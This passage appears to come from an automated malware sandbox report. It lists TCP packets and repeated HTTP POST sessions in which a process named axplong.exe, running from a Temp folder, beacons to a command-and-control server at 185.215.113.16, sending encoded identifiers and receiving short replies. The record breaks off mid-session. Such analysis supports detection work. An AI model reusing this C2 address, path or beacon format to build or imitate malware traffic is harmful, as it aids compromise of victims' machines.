                                                                  Sep 27, 2024 11:31:08.028961897 CEST6512280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.029298067 CEST8065121185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:08.029346943 CEST6512180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.029510975 CEST6512280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.034370899 CEST8065122185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:08.733987093 CEST8065122185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:08.734886885 CEST6512280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.853804111 CEST6512280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.854115963 CEST6512380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.862552881 CEST8065123185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:08.862694979 CEST6512380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.862718105 CEST8065122185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:08.862838984 CEST6512380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.863091946 CEST6512280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:08.871434927 CEST8065123185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:09.565476894 CEST8065123185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:09.565551996 CEST6512380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:09.568449020 CEST6512380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:09.568741083 CEST6512480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:09.573633909 CEST8065123185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:09.573647022 CEST8065124185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:09.573724985 CEST6512480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:09.573734999 CEST6512380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:09.588495970 CEST6512480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:09.593353987 CEST8065124185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:10.306952953 CEST8065124185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:10.307005882 CEST6512480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:10.419038057 CEST6512480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:10.419397116 CEST6512580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:10.424285889 CEST8065124185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:10.424345970 CEST6512480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:10.424613953 CEST8065125185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:10.424685001 CEST6512580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:10.424969912 CEST6512580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:10.429941893 CEST8065125185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.116766930 CEST8065125185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.116869926 CEST6512580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.142342091 CEST6512580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.142771959 CEST6512680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.147651911 CEST8065126185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.147731066 CEST6512680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.147805929 CEST8065125185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.147849083 CEST6512580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.148034096 CEST6512680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.154341936 CEST8065126185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.871057987 CEST8065126185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.871129036 CEST6512680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.978355885 CEST6512680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.978713036 CEST6512780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.984185934 CEST8065126185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.984246969 CEST8065127185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.984306097 CEST6512680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.984347105 CEST6512780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.984565973 CEST6512780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:11.992868900 CEST8065127185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:11.995452881 CEST6512780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.003268003 CEST6512880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.011718988 CEST8065128185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:12.011830091 CEST6512880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.012002945 CEST6512880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.020389080 CEST8065128185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:12.749566078 CEST8065128185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:12.749639988 CEST6512880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.853892088 CEST6512880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.859568119 CEST8065128185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:12.859637976 CEST6512980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.859658957 CEST6512880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.865273952 CEST8065129185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:12.865464926 CEST6512980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.865654945 CEST6512980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:12.870445967 CEST8065129185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:13.584402084 CEST8065129185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:13.584489107 CEST6512980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:13.593420029 CEST6512980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:13.598344088 CEST8065129185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:13.821906090 CEST8065129185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:13.823586941 CEST6512980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:13.938375950 CEST6512980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:13.938937902 CEST6513080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:13.944046021 CEST8065129185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:13.944061995 CEST8065130185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:13.944113016 CEST6512980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:13.944149017 CEST6513080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:13.945755005 CEST6513080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:13.950978994 CEST8065130185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:14.634277105 CEST8065130185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:14.634507895 CEST6513080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:14.637547016 CEST6513080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:14.637851000 CEST6513180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:14.642613888 CEST8065130185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:14.642676115 CEST6513080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:14.642680883 CEST8065131185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:14.642889977 CEST6513180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:14.643163919 CEST6513180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:14.647994041 CEST8065131185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:15.349911928 CEST8065131185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:15.349987030 CEST6513180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:15.462517977 CEST6513180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:15.462826014 CEST6513280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:15.468199968 CEST8065132185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:15.468348026 CEST8065131185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:15.471601963 CEST6513180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:15.471771002 CEST6513280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:15.471771002 CEST6513280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:15.477094889 CEST8065132185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:16.183041096 CEST8065132185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:16.183110952 CEST6513280192.168.2.6185.215.113.16

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 27, 2024 11:29:53.326287985 CEST5350385162.159.36.2192.168.2.6
                                                                  Sep 27, 2024 11:29:54.514117002 CEST53652741.1.1.1192.168.2.6

                                                                  HTTP Request Dependency Graph

                                                                  • 185.215.113.16

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.665060185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:04.075659037 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:04.794305086 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:04.796751022 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:05.025235891 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.665061185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:05.143078089 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:05.844012022 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:05.910186052 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:06.143379927 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.665062185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:06.262881994 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:06.969969988 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:06.970972061 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:07.201378107 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.665063185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:07.309784889 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:08.027483940 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:08.028548956 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:08.258482933 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.665064185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:08.375638008 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:09.085366964 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:09.086894035 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:09.317621946 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.665065185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:09.435410023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:10.160864115 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:10.161812067 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:10.465637922 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.665066185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:10.575356960 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:11.293389082 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:11.294153929 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:11.524995089 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.665067185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:30:11.640261889 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:12.346571922 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
